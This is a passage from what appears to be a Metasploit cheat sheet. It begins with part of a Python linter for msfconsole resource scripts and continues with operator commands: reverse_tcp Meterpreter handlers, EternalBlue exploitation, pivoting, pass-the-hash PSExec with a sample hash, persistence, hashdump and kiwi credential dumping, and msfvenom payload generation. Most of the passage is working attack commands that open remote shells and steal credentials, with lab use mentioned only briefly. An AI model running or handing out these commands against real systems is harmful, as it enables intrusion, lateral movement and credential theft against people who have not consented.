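                findings.append(f"line {lineno}: 'use' without a module name")
        elif cmd in ("set", "setg"):
            if len(args) < 2:
                findings.append(f"line {lineno}: '{cmd}' needs an option name and a value")
            else:   # option names are case-insensitive in msfconsole
                (glob if cmd == "setg" else local)[args[0].upper()] = " ".join(args[1:])
        elif cmd in ("unset", "unsetg"):
            if args:
                (glob if cmd == "unsetg" else local).pop(args[0].upper(), None)
        elif cmd in ("run", "exploit"):
            if module is None:
                findings.append(f"line {lineno}: '{cmd}' before any 'use'")
                continue
            effective = {**glob, **local}      # module options override globals
            jobified = "-j" in args
            if module == "exploit/multi/handler":
                for opt in REQUIRED_FOR_HANDLER:
                    if opt not in effective:
                        findings.append(f"line {lineno}: handler started without {opt}")
                if effective.get("EXITONSESSION", "").lower() == "false" and not jobified:
                    findings.append(f"line {lineno}: ExitOnSession false only keeps listening "
                                    "when the handler runs as a job; add -j")
    return findings


# The handler script from this cheat sheet, reproduced as test input.
HANDLER_RC = """\
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j
"""

# A constructed, deliberately broken script: no LPORT, handler run in the foreground.
BROKEN_RC = """\
# forgot the port
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set ExitOnSession false
run
"""

if __name__ == "__main__":
    for name, rc in (("handler.rc", HANDLER_RC), ("broken.rc", BROKEN_RC)):
        print(name, lint_rc(rc) or ["ok"])
```

Because setg values are tracked separately and merged at each run/exploit, a script that relies on a LHOST set globally in an earlier script will be reported as missing it; that is deliberate, since an .rc file that only works after another one has run is exactly the kind of dependency that bites on a fresh msfconsole.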

Jobs

# List background jobs
msf> jobs
msf> jobs -l

# Kill a job
msf> jobs -k 0

# Kill all jobs
msf> jobs -K

Useful Combinations

Initial Compromise → Lateral Movement

# 1. Exploit entry point
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit -j

# 2. Add pivot route
msf> route add 192.168.2.0/24 1

# 3. Scan internal network through pivot
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run

# 4. Exploit internal targets through pivot
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.2.20
msf> exploit -j

Quick Domain Compromise (if you have admin hash)

# Pass-the-hash with PSExec
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.1.1
msf> set SMBUser administrator
msf> set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run

Persistence + Cleanup Awareness

# Always document what you plant
meterpreter> run post/windows/manage/persistence SESSION=1

# List persistence items (manual check)
msf> use post/windows/gather/enum_services

# Cleanup before leaving (on authorized engagements)
msf> use post/windows/manage/persistence_exe
msf> set ACTION REMOVE

Quick Reference Card

Task                   | Command
Start msfconsole       | msfconsole -q
Search modules         | search type:exploit ms17-010
Use module             | use exploit/windows/smb/ms17_010_eternalblue
Show options           | show options
Set target             | set RHOSTS 192.168.1.1
Set payload            | set PAYLOAD windows/x64/meterpreter/reverse_tcp
Run exploit            | run or exploit
Background session     | background or bg
List sessions          | sessions -l
Interact with session  | sessions -i 1
Get SYSTEM             | getsystem
Dump hashes            | hashdump (or load kiwi; creds_all)
Upload file            | upload /local/file C:\\remote\\path
Download file          | download C:\\remote\\path /local/
Pivot routing          | route add 192.168.2.0/24 1
Port forward           | portfwd add -l 3389 -p 3389 -r 192.168.2.1
Generate payload       | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o p.exe
Import Nmap scan       | db_import scan.xml

Metasploit vs. Other Tools

Metasploit doesn’t replace everything — know when to use something else.

Task                 | Metasploit                      | Alternative
Exploitation         | ✅ Strong module library         | Manual exploit code, CrackMapExec
Post-exploitation    | ✅ Meterpreter                   | Cobalt Strike, Havoc, Sliver
Payload generation   | ✅ msfvenom                      | Sliver, Nimpackt, custom
AV Evasion           | ⚠️ Limited (signatures known)    | Veil, Shelter, manual obfuscation
C2 / Long-haul ops   | ⚠️ Not built for stealth         | Cobalt Strike, Brute Ratel, Mythic
Network scanning     | ⚠️ Slower than Nmap              | Nmap, Masscan, Rustscan
Password attacks     | ✅ Good brute force              | Hydra, Medusa, Hashcat

For lab work and certification prep, Metasploit is the standard. For real red team ops, it’s a starting point — most serious operators use custom C2s for stealth.


Practice Environment

Metasploit without a target is useless. Get one:

  • TryHackMe — beginner-friendly rooms, many built around Metasploit workflows
  • Hack The Box — more realistic, plenty of MSF-compatible machines in Starting Point
  • Your own lab — spin up a Windows VM or a vulnerable appliance (Metasploitable, DVWA) and fire away

For remote practice without VPN overhead, a $5-6 VPS on Vultr or DigitalOcean gives you a clean attack box with low latency. Spin it up, test, destroy it. No traces on your home IP, no VPN slowdowns.


What’s New in Metasploit 2026

  • Framework 6.4+ ships with improved evasion for Meterpreter HTTPS transport — certificate pinning and JA3 randomization
  • New modules covering cloud-native attack surfaces: AWS metadata service abuse, Azure IMDS exploitation
  • sessions -u session upgrade is more reliable across Windows 11 + Server 2022 targets
  • load kiwi updated to match Mimikatz 2.2.0 API changes — creds_all more stable on patched domain controllers
  • SOCKS5 proxy module now supports authentication, closing a gap that made pivoting detectable in some environments

Metasploit is the closest thing to a Swiss Army knife in offensive security. It won’t win every engagement alone — but knowing it cold means you move faster when it matters.


This guide is updated regularly. Bookmark it.
